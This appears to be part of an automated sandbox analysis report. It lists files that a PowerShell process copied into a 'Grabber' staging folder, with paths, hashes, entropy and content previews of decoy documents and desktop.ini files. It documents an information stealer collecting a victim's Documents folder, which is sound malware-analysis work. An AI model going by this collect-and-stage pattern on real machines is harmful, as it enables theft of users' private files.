                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\GRXZDKKVDB\GRXZDKKVDB.docx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.697358951122591
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                      MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                      SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                      SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                                                      SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\GRXZDKKVDB\KLIZUSIQEN.jpg

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696703751818505
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
                                                                                      MD5:19255ED5D4F37A096C105CEF82D0F5C0
                                                                                      SHA1:96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
                                                                                      SHA-256:A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
                                                                                      SHA-512:CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\GRXZDKKVDB\QCOILOQIKC.png

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.697125102277996
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:uVOXLU7xwK58ZsokCVVZGi4eW0ZFJVPNR+x:c7xR8mwGi4sbv+x
                                                                                      MD5:207485EFCE70435971C31586A1E4CF97
                                                                                      SHA1:245A410AEB767B099944A8E81F75FC9A4B270DFB
                                                                                      SHA-256:BF45E8FD687DC0E63FD40F32F2279152430579EDE044C3BB0852A1AC460D4B09
                                                                                      SHA-512:A7F01CBBAFE9EA12B4C820F5E1A107D4C6FBD57CFF41C4AC679485F2B7DAFA4E9148AF830A39A083EC866E988A8E279FEB39D5EB58593E75D22253BED4DEFA19
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:QCOILOQIKCUYMAHQLCLSCUGPPLVTJEARXPXBWFLOFHRVUSXLZVWHDQNKEMGPPQAGBLIPFAECDZNKKHITNQJASUXZAYMZIQCEHAQMCVZBMFUDBNQEKCBNCGMUWXDJLMJKVRKYBLRGNWGBGEVIGVROENGUXKJERNJSJJEMVLDKUXDFUWUPQNWUYRIEPUFOQKPDSZXXCKNQVBEAVMDMBRZSWYPCNALGHTDFWFNDXKSHXCRLYPVFVYVEOFRHUFZZGNIXSJQCPZGONOYWWUQLBEBGALPOGZBXJUYXTHWOKWNKJYPSELALXQYIKAHXCELBTKSQFTNYWBHRPQFULPLOCWEQAXEQNXOBIQOYFSEEZWHQQLZPBQOUMVZIMRWRLSPDKEBXSTPZLAGVYIORHCDBXTBHYOFKACXVGKKSIFHPOLDOQGIDQPFPVIPGUCGUCQLFFBYAGFJYFOMBUMPAHPQLDOHYAMKEGSDPXEYBQJUOWZOPFYRTLYUYDJHPLVEXBXUGVUEYIBUTUABUIHROFHZMLJUXWGZILWRHVKGOSZXXCIWGRGUZQDKQMTXRRWHDLJPPIRDALEIAYYTEEONIAELEISEOGNTDSALVOZDMFPLJSJMKJYMWGSKCTXHTLYYFJSXNZMDELRTJBNXSGAOEPKCPEEPFZKCAATOWHUWGQAEQNZHTKQEUCFRXVJWOGAEQDIWARNNFKCHEDRWTKEOVTURBKPDMQPPDCJGTYCTIRELHGRIRLWAPLCEHANSMGDZZYCXXDOTQVOSDZJAEBOTEVLSMHXCOWDPVQPSGDIDBAWUTDPIYPVBFSUMFBUYOPRXLECFHENURLSLKGPFWXDUFYOAKNTFKOYFUZEKLRZOLPYKMCKVZOIMDCCSGPQNCQXJOTJDKUQEPVHFKRSGZYJBNUHVTOEMNLTDXGZHTDQFQZCOULTNVZRAVLOIOVIKUTWPYLRJUCUDMYVYFWSBLJTJKMSJEIJXWYNPKGTYLKDAEVBUQUIJX

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\KLIZUSIQEN.jpg

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696703751818505
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
                                                                                      MD5:19255ED5D4F37A096C105CEF82D0F5C0
                                                                                      SHA1:96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
                                                                                      SHA-256:A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
                                                                                      SHA-512:CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\KLIZUSIQEN.pdf

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696703751818505
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
                                                                                      MD5:19255ED5D4F37A096C105CEF82D0F5C0
                                                                                      SHA1:96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
                                                                                      SHA-256:A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
                                                                                      SHA-512:CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\My Music\desktop.ini

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):504
                                                                                      Entropy (8bit):3.5258560106596737
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:QZsiL5wmHOlDmo0qml3lDmo0qmZclLwr2FlDmo0IWUol94klrgl2FlDmo0qjKAZY:QCGwv4o0x34o02lLwiF4o0ZvbUsF4o0Z
                                                                                      MD5:06E8F7E6DDD666DBD323F7D9210F91AE
                                                                                      SHA1:883AE527EE83ED9346CD82C33DFC0EB97298DC14
                                                                                      SHA-256:8301E344371B0753D547B429C5FE513908B1C9813144F08549563AC7F4D7DA68
                                                                                      SHA-512:F7646F8DCD37019623D5540AD8E41CB285BCC04666391258DBF4C42873C4DE46977A4939B091404D8D86F367CC31E36338757A776A632C7B5BF1C6F28E59AD98
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.0.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.0.8.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.7.....

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\My Pictures\Camera Roll\desktop.ini

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):190
                                                                                      Entropy (8bit):3.5497401529130053
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                                                      MD5:D48FCE44E0F298E5DB52FD5894502727
                                                                                      SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                                                      SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                                                      SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\My Pictures\Saved Pictures\desktop.ini

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):190
                                                                                      Entropy (8bit):3.5497401529130053
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                                                      MD5:87A524A2F34307C674DBA10708585A5E
                                                                                      SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                                                      SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                                                      SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\My Pictures\desktop.ini

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):504
                                                                                      Entropy (8bit):3.514398793376306
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                                                      MD5:29EAE335B77F438E05594D86A6CA22FF
                                                                                      SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                                                      SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                                                      SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\My Videos\desktop.ini

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):504
                                                                                      Entropy (8bit):3.5218877566914193
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:QZsiL5wmHOlDmo0qmclDmo0qmJclLwr2FlDmo0IWVvklrgl2FlDmo0qjKArn:QCGwv4o0o4o0mlLwiF4o090UsF4o01Ar
                                                                                      MD5:50A956778107A4272AAE83C86ECE77CB
                                                                                      SHA1:10BCE7EA45077C0BAAB055E0602EEF787DBA735E
                                                                                      SHA-256:B287B639F6EDD612F414CAF000C12BA0555ADB3A2643230CBDD5AF4053284978
                                                                                      SHA-512:D1DF6BDC871CACBC776AC8152A76E331D2F1D905A50D9D358C7BF9ED7C5CBB510C9D52D6958B071E5BCBA7C5117FC8F9729FE51724E82CC45F6B7B5AFE5ED51A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.1.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.9.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.9.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.8.....

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\NVWZAPQSQL.docx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6998645060098685
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                                                      MD5:1676F91570425F6566A5746BC8E8427E
                                                                                      SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                                                      SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                                                      SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\NVWZAPQSQL\BJZFPPWAPT.jpg

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.704346314649071
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                      Malicious:false
                                                                                      Reputation:unknown
